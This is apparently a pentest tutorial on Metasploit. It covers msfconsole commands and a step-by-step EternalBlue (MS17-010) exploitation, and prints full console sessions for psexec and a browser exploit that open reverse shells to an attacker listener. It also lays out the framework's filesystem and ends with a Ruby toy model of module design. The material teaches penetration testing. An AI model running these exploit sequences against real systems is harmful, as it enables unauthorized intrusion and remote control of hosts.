# Metasploit

###### tags: `pentest log`

cite: `https://docs.rapid7.com/metasploit/metasploitable-2-exploitability-guide` `https://searchsecurity.techtarget.com/tip/Using-Metasploit-for-real-world-security-tests`

## Need-to-know Metasploit commands (mostly show, set, use)

Below is an example of a Metasploit test using the free Metasploit Framework. I will be testing for WannaCry, a worm that exploited a vulnerability in the Microsoft Server Message Block protocol known as EternalBlue. Before jumping into the specific steps to execute this exploit, there are some common Metasploit console commands you should know about. The Metasploit console is referred to as msfconsole, which also happens to be the name of the batch file that starts up the program. Commands you should be familiar with include:

- `help` (or `?`) shows the available commands in msfconsole;
- `info` shows a description of the specific exploit you're using along with its various options and requirements;
- `show options` shows the various parameters for the specific exploit you're working with;
- `show targets` shows the available target OSes and applications that can be exploited;
- `show exploits` shows the exploits you can run -- in our example, the `windows/smb/ms17_010_eternalblue` exploit;
- `show payloads` shows the various payload options you can execute on the exploited system, such as spawning a command shell, uploading programs to run, etc.
  -- in our example, the `generic/shell_reverse_tcp` payload;
- `use [exploit name]` instructs msfconsole to enter into a specific exploit's environment -- for example, `use windows/smb/ms17_010_eternalblue` will bring up the command prompt `msf5 exploit(windows/smb/ms17_010_eternalblue) >`;
- `set PAYLOAD` allows you to set the specific payload for your exploit -- in our example, `set PAYLOAD generic/shell_reverse_tcp`;
- `set TARGET` allows you to select a specific target OS or application when allowed by certain exploits;
- `set RHOST` allows you to set your target (remote) host's IP address -- in this example, `set RHOST 10.1.1.208`;
- `set LHOST` allows you to set the local host's IP address for the reverse communications needed to open the reverse command shell -- in this example, `set LHOST 10.1.1.214`;
- `back` allows you to exit the current exploit environment you've loaded and go back to the main msfconsole prompt;
- `exit` allows you to exit the Metasploit console.
- `banner` simply displays a randomly selected banner.
- `check` -- There aren't many exploits that support it, but there is also a check option that will check whether a target is vulnerable to a particular exploit instead of actually exploiting it.
- `connect` -- There is a miniature Netcat clone built into msfconsole that supports SSL, proxies, pivoting, and file transfers. By issuing the connect command with an IP address and port number, you can connect to a remote host from within msfconsole the same as you would with Netcat or Telnet.
- `edit` -- The edit command will edit the current module with $VISUAL or $EDITOR. By default, this will open the current module in Vim.
- `grep` -- The grep command is similar to Linux grep. It matches a given pattern from the output of another msfconsole command.
- `irb` -- Running the irb command will drop you into a live Ruby interpreter shell where you can issue commands and create Metasploit scripts on the fly.
  This feature is also very useful for understanding the internals of the Framework.
- `jobs` -- Jobs are modules that are running in the background. The jobs command provides the ability to list and terminate these jobs.
- `kill` -- The kill command will kill any running job when supplied with the job id.
- `load` -- The load command loads a plugin from Metasploit's plugin directory. Arguments are passed as key=val on the shell.
- `route` -- The route command in Metasploit allows you to route sockets through a session or 'comm', providing basic pivoting capabilities. To add a route, you pass the target subnet and network mask followed by the session (comm) number.
- `search` -- The msfconsole includes an extensive regular-expression based search functionality. If you have a general idea of what you are looking for, you can search for it via search. For example, a search for MS Bulletin MS09-011 will locate this string within the module names, descriptions, references, etc.
- `sessions` -- The sessions command allows you to list, interact with, and kill spawned sessions. The sessions can be shells, Meterpreter sessions, VNC, etc.

Another important command worth noting is msfupdate. Msfupdate is not a command that you run within the console, but an external program built into the Metasploit Framework. Msfupdate is a batch file located in the Metasploit Framework `\bin` folder that will download and update your running instance of Metasploit to the latest version.

## How to use Metasploit: Step by Step

Now that I've described the basic commands, let's take a look at some specific steps required to carry out a real-world exploit. My testing system is a Windows 10 workstation running the latest Metasploit Framework. My test target in this example is a Windows 7 Professional workstation that has the MS17-010 SMB vulnerability that facilitates the EternalBlue and WannaCry ransomware exploit.
I chose to demonstrate the exploitation of this vulnerability because it's still very common on nearly every internal network environment I test. It's also simple to exploit and has some pretty dire consequences. I know my target system has this vulnerability because I discovered it using the Nessus vulnerability scanner. There are plenty of other vulnerability scanners, such as Nexpose and QualysGuard, that can uncover this and similar vulnerabilities as well.

This approach to finding and then exploiting vulnerabilities is the standard vulnerability and penetration testing methodology, but it's not required. You can blindly test your systems or, even better, Metasploit can do some of the legwork for you, as certain exploits have detection checks to see if a system is vulnerable before exploiting it. For example, in the context of our sample exploit, there's a Metasploit module called MS17-010 SMB RCE Detection that can be launched inside the Metasploit console and can determine whether or not a system has been patched against this vulnerability.

### Step 1: Start Metasploit

I load msfconsole.bat via the default installation folder of `C:\metasploit-framework\bin` and its command prompt comes up.

![Metasploit command prompt screenshot](https://i.imgur.com/u3mQdnW.png)

Note: At this point you can enter `show exploits` to see which exploits are available to run.

### Step 2: Load an exploit to run

I enter `use windows/smb/ms17_010_eternalblue` to run the specific exploit I know the system is vulnerable to, and it loads up that specific exploit's environment prompt (hence the `windows/smb/ms17_010_eternalblue >` prompt).

![Loading an exploit into Metasploit](https://i.imgur.com/0qFIXu6.png)

### Step 3: Show supported payloads

I then enter `show payloads` to determine which payloads can be sent via this exploit.
![Showing payloads in Metasploit](https://i.imgur.com/Q2lz9ox.png)

### Step 4: Set the payload option

I decide to keep things simple and have the exploit open up a reverse command shell, so I enter `set PAYLOAD generic/shell_reverse_tcp`. If you wish to use the Meterpreter functionality built into Metasploit, you could use a similar payload such as `windows/meterpreter/reverse_tcp`. For this exploit, all the Windows targets are the same -- Windows 7 and Server 2008 R2. Other exploits have different target options; you can set that value using the `set TARGET` command from above.

![Setting a Metasploit payload](https://i.imgur.com/YD5Xok3.png)

### Step 5: Show exploit options

I then enter `show options` to determine the non-optional exploit and payload parameters that don't have defaults and therefore must be set.

![Showing exploit options in Metasploit](https://i.imgur.com/KSs9UiV.png)

### Step 6: Set the required options

I'll enter the RHOST and LHOST parameters via `set RHOST 10.1.1.243` and `set LHOST 10.1.1.215` and then enter `show options` one final time to make sure everything is set correctly.

![Setting required options in Metasploit](https://i.imgur.com/g2p2xNM.png)

### Step 7: Run the exploit

Finally, I enter `exploit` to run the exploit and send the payload to my target system -- and voila -- the connection is established and I have a command prompt on the remote system. Vulnerability and penetration testing at its finest.

![Running a Metasploit exploit](https://i.imgur.com/L6efTjg.png)

### Summary

The 3 essential elements:

```graphviz
graph graphname {
    rankdir=LR;
    exploit -- target;
    payload -- exploit;
    target -- payload;
}
```

## Using Metasploit: There's more

All exploits in the Metasploit Framework will fall into two categories: **active and passive**.

### Active

Active exploits will exploit a specific host, run until completion, and then exit.

- Brute-force modules will exit when a shell opens from the victim.
- Module execution stops if an error is encountered.
- You can force an active module to the background by passing `exploit -j`.

Example:

```shell=
msf > use exploit/windows/smb/psexec
msf exploit(psexec) > set RHOST 192.168.1.100
RHOST => 192.168.1.100
msf exploit(psexec) > set PAYLOAD windows/shell/reverse_tcp
PAYLOAD => windows/shell/reverse_tcp
msf exploit(psexec) > set LHOST 192.168.1.5
LHOST => 192.168.1.5
msf exploit(psexec) > set LPORT 4444
LPORT => 4444
msf exploit(psexec) > set SMBUSER victim
SMBUSER => victim
msf exploit(psexec) > set SMBPASS s3cr3t
SMBPASS => s3cr3t
msf exploit(psexec) > exploit

[*] Connecting to the server...
[*] Started reverse handler
[*] Authenticating as user 'victim'...
[*] Uploading payload...
[*] Created \hikmEeEM.exe...
[*] Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.1.100[\svcctl] ...
[*] Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.1.100[\svcctl] ...
[*] Obtaining a service manager handle...
[*] Creating a new service (ciWyCVEp - "MXAVZsCqfRtZwScLdexnD")...
[*] Closing service handle...
[*] Opening service...
[*] Starting the service...
[*] Removing the service...
[*] Closing service handle...
[*] Deleting \hikmEeEM.exe...
[*] Sending stage (240 bytes)
[*] Command shell session 1 opened (192.168.1.5:4444 -> 192.168.1.100:1073)

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>
```

### Passive

Passive exploits wait for incoming hosts and exploit them as they connect.

- Passive exploits almost always focus on clients such as web browsers, FTP clients, etc.
- They can also be used in conjunction with email exploits, waiting for connections.
- Passive exploits report shells as they happen; they can be enumerated by passing `-l` to the sessions command. Passing `-i` will interact with a shell.
Example:

```shell=
msf > use exploit/windows/browser/ani_loadimage_chunksize
msf exploit(ani_loadimage_chunksize) > set URIPATH /
URIPATH => /
msf exploit(ani_loadimage_chunksize) > set PAYLOAD windows/shell/reverse_tcp
PAYLOAD => windows/shell/reverse_tcp
msf exploit(ani_loadimage_chunksize) > set LHOST 192.168.1.5
LHOST => 192.168.1.5
msf exploit(ani_loadimage_chunksize) > set LPORT 4444
LPORT => 4444
msf exploit(ani_loadimage_chunksize) > exploit
[*] Exploit running as background job.

[*] Started reverse handler
[*] Using URL: http://0.0.0.0:8080/
[*] Local IP: http://192.168.1.5:8080/
[*] Server started.
msf exploit(ani_loadimage_chunksize) >
[*] Attempting to exploit ani_loadimage_chunksize
[*] Sending HTML page to 192.168.1.100:1077...
[*] Attempting to exploit ani_loadimage_chunksize
[*] Sending Windows ANI LoadAniIcon() Chunk Size Stack Overflow (HTTP) to 192.168.1.100:1077...
[*] Sending stage (240 bytes)
[*] Command shell session 2 opened (192.168.1.5:4444 -> 192.168.1.100:1078)

msf exploit(ani_loadimage_chunksize) > sessions -i 2
[*] Starting interaction with 2...

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\victim\Desktop>
```

## Metasploit Filesystem

The MSF filesystem is laid out in an intuitive manner and is organized by directory. Some of the more important directories are briefly outlined below.

### data

The data directory contains editable files used by Metasploit to store binaries required for certain exploits, wordlists, images, and more.

```shell=
root@kali:~# ls /usr/share/metasploit-framework/data/
cpuinfo              ipwn            meterpreter    snmp            webcam
eicar.com            isight.bundle   mime.yml       sounds          wmap
eicar.txt            john.conf       msfcrawler     SqlClrPayload   wordlists
emailer_config.yaml  lab             passivex       templates
exploits             logos           php            vncdll.x64.dll
flash_detector       markdown_doc    post           vncdll.x86.dll
```

### documentation

As its name suggests, the documentation directory contains the available documentation for the framework.
```shell=
root@kali:~# ls /usr/share/metasploit-framework/documentation/
changelog.Debian.gz  CONTRIBUTING.md.gz  developers_guide.pdf.gz  README.md
CODE_OF_CONDUCT.md   copyright           modules
```

### lib

The lib directory contains the 'meat' of the framework code base.

```shell=
root@kali:~# ls /usr/share/metasploit-framework/lib/
anemone        msfenv.rb        rbmysql.rb  sqlmap
anemone.rb     net              rex         tasks
enumerable.rb  postgres         rex.rb      telephony
metasm         postgres_msf.rb  robots.rb   telephony.rb
metasploit     rabal            snmp        windows_console_color_support.rb
msf            rbmysql          snmp.rb
```

### modules

The modules directory is where you will find the actual MSF modules for **exploits**, **auxiliary** and post modules, **payloads**, encoders, and nop generators.

```shell=
root@kali:~# ls /usr/share/metasploit-framework/modules/
auxiliary  encoders  exploits  nops  payloads  post
```

Almost all of your interaction with Metasploit will be through its many modules, which it looks for in two locations. The first is the primary module store under `/usr/share/metasploit-framework/modules/` and the second, which is where you will store custom modules, is under your home directory at `~/.msf4/modules/`.

#### Exploits

In the Metasploit Framework, exploit modules are defined as modules that use payloads.

```shell=
root@kali:~# ls /usr/share/metasploit-framework/modules/exploits/
aix        bsdi        firefox  irix       multi    solaris
android    dialup      freebsd  linux      netware  unix
apple_ios  example.rb  hpux     mainframe  osx      windows
```

#### Auxiliary

Auxiliary modules include port scanners, fuzzers, sniffers, and more.

```shell=
root@kali:~# ls /usr/share/metasploit-framework/modules/auxiliary/
admin    client   dos         gather  scanner  spoof  vsploit
analyze  crawler  example.rb  parser  server   sqli
bnat     docx     fuzzers     pdf     sniffer  voip
```

#### Payloads, Encoders, Nops

Payloads consist of code that runs remotely, while encoders ensure that payloads make it to their destination intact. Nops keep the payload sizes consistent across exploit attempts.
```shell=
root@kali:~# ls /usr/share/metasploit-framework/modules/payloads/
singles  stagers  stages
root@kali:~# ls /usr/share/metasploit-framework/modules/encoders/
cmd  generic  mipsbe  mipsle  php  ppc  ruby  sparc  x64  x86
root@kali:~# ls /usr/share/metasploit-framework/modules/nops/
aarch64  armle  mipsbe  php  ppc  sparc  tty  x64  x86
```

#### Loading Additional Module Trees

Metasploit gives you the option to load modules either at runtime or after msfconsole has already been started. Pass the `-m` option when running msfconsole to load additional modules at runtime:

```shell=
root@kali:~# msfconsole -m ~/secret-modules/
```

If you need to load additional modules from within msfconsole, use the `loadpath` command:

```shell=
msf > loadpath
Usage: loadpath </path/to/modules>
Loads modules from the given directory which should contain subdirectories for
module types, e.g. /path/to/modules/exploits

msf > loadpath /usr/share/metasploit-framework/modules/
Loaded 399 modules:
    399 payloads
```

### plugins

Metasploit includes many plugins, which you will find in this directory.

```shell=
root@kali:~# ls /usr/share/metasploit-framework/plugins/
aggregator.rb      ips_filter.rb  openvas.rb           sounds.rb
alias.rb           komand.rb      pcap_log.rb          sqlmap.rb
auto_add_route.rb  lab.rb         request.rb           thread.rb
beholder.rb        libnotify.rb   rssfeed.rb           token_adduser.rb
db_credcollect.rb  msfd.rb        sample.rb            token_hunter.rb
db_tracker.rb      msgrpc.rb      session_notifier.rb  wiki.rb
event_tester.rb    nessus.rb      session_tagger.rb    wmap.rb
ffautoregen.rb     nexpose.rb     socket_logger.rb
```

### scripts

The scripts directory contains Meterpreter and other scripts.

```shell=
root@kali:~# ls /usr/share/metasploit-framework/scripts/
meterpreter  ps  resource  shell
```

### tools

The tools directory has various useful command-line utilities.
```shell=
root@kali:~# ls /usr/share/metasploit-framework/tools/
context  dev  exploit  hardware  memdump  modules  password  recon
```

### Metasploit Libraries

There are a number of MSF libraries that allow us to run our exploits without having to write additional code for rudimentary tasks, such as HTTP requests or encoding of payloads. Some of the most important libraries are outlined below.

## MSF architecture

![](https://i.imgur.com/5fwZfdh.png)

In the Metasploit Framework, all modules are `Ruby` classes.

- Modules inherit from the type-specific class
- The type-specific class inherits from the Msf::Module class
- There is a shared common API between modules

Payloads are slightly different.

- Payloads are created at runtime from various components
- Glue together stagers with stages
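As an added illustration of the module design just described and of the `show options` / `set` workflow from Steps 4 to 6 (this is not Metasploit's own code; `Msf::Module`, `Msf::Exploit`, `Msf::Payload`, `Opt`, `set`, `missing_required` and `run` are all names assumed here for a toy model), a minimal Ruby sketch of a shared base class, type-specific subclasses, and a datastore that refuses to run while required options are unset:

```ruby
# Added toy model of the MSF module design: a shared base class, type-specific
# subclasses, and a datastore filled by `set`. It is NOT the real Metasploit
# API; every class and method name below is an assumption made for illustration.
module Msf
  # One row of `show options`: name, required?, default, description.
  Opt = Struct.new(:name, :required, :default, :desc)

  # Common API that every module type inherits.
  class Module
    attr_reader :datastore
    def initialize
      @datastore = {}
      options.each { |o| @datastore[o.name] = o.default unless o.default.nil? }
    end
    def options; []; end                    # concrete modules override this
    def set(name, value)                    # console `set NAME VALUE`
      raise ArgumentError, "unknown option #{name}" unless options.any? { |o| o.name == name }
      @datastore[name] = value
    end
    # Required options still without a value: what `show options` says must be set.
    def missing_required
      options.select { |o| o.required && @datastore[o.name].nil? }.map(&:name)
    end
  end

  # Payloads are modules too; a reverse-TCP payload needs a listener address/port.
  class Payload < Module
    def options
      [Opt.new("LHOST", true, nil, "Listener address"), Opt.new("LPORT", true, 4444, "Listener port")]
    end
  end

  # Exploits add target options and carry the selected payload.
  class Exploit < Module
    attr_reader :payload
    def options
      [Opt.new("RHOST", true, nil, "Target address"), Opt.new("RPORT", true, 445, "Target port")]
    end
    def set(name, value)
      if name == "PAYLOAD"                   # `set PAYLOAD ...` attaches a payload module
        @payload = Payload.new
        return @datastore["PAYLOAD"] = value
      end
      (payload && payload.options.any? { |o| o.name == name }) ? payload.set(name, value) : super
    end
    # Exploit and payload options together, as `show options` prints them.
    def missing_required
      super + (payload ? payload.missing_required : ["PAYLOAD"])
    end
    # `exploit` refuses to run until nothing is missing; here it only reports the plan.
    def run
      missing = missing_required
      raise ArgumentError, "set these first: #{missing.join(', ')}" unless missing.empty?
      "#{datastore['RHOST']}:#{datastore['RPORT']} <- #{payload.datastore['LHOST']}:#{payload.datastore['LPORT']}"
    end
  end
end
```

Walking through `set PAYLOAD`, `set RHOST` and `set LHOST` in that order reproduces the way `show options` shrinks its list of missing required parameters in Steps 4 to 6; nothing here opens a socket.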